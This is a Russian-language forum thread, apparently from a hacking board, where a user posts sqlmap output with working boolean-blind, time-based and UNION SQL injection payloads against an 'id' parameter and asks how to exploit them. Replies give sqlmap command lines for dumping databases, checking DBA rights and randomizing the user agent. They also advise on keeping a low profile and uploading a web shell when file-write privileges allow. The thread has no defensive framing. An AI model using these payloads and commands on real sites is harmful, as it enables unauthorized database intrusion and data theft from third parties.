Просмотр полной версии : Как использовать иньекции которые предоставил sqlmap?
Добрый день!
При работе с sqlmap, мне выдало следующее:
Код:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: id=-6433' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f465949 72424768546c65456a425a484a504b6e6362454f6b4d504258 51,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?
g00db0y сказал(а):
Добрый день!
При работе с sqlmap, мне выдало следующее:
Код:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: id=-6433' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f465949 72424768546c65456a425a484a504b6e6362454f6b4d504258 51,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?
Например подставить значение поля payload в url?
sudo сказал(а):
Например подставить значение поля payload в url?
вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло
g00db0y сказал(а):
вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло
Значит прога ошиблась и пейлоады оказались нерабочими. Логично?
sudo сказал(а):
Значит прога ошиблась и пейлоады оказались нерабочими. Логично?
А ведь логично, спасибо!
jess_hide
07.09.2018, 22:01
А зачем тебе в урл добавлять, раскрути sqlmap там же есть специальная функция, почитай help
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
Iskus сказал(а):
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
Я обычно добавляю что-то типа --current-user. Менее палево, нежели делать вероятно ненужный дамп. Лучше руками побегать по таблицам посмотреть что есть. Если filepriv позволяет писать файлы - заливаем шелл - дампим базу не селектами. (сценарий из разряда "как в сказке ")
qnit сказал(а):
Parameter: id (GET)
sqlmap.py -u "Bigfoot – Leaving Lasting Footprints in the World of Entertainment" --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent
Звездочку только не надо в конце.
leonardocs
14.03.2019, 21:32
qnit сказал(а):
тогда --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent -p id
извините за идиотский вопрос, но из-за 10 потоков шанс улететь в блок увеличивается?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot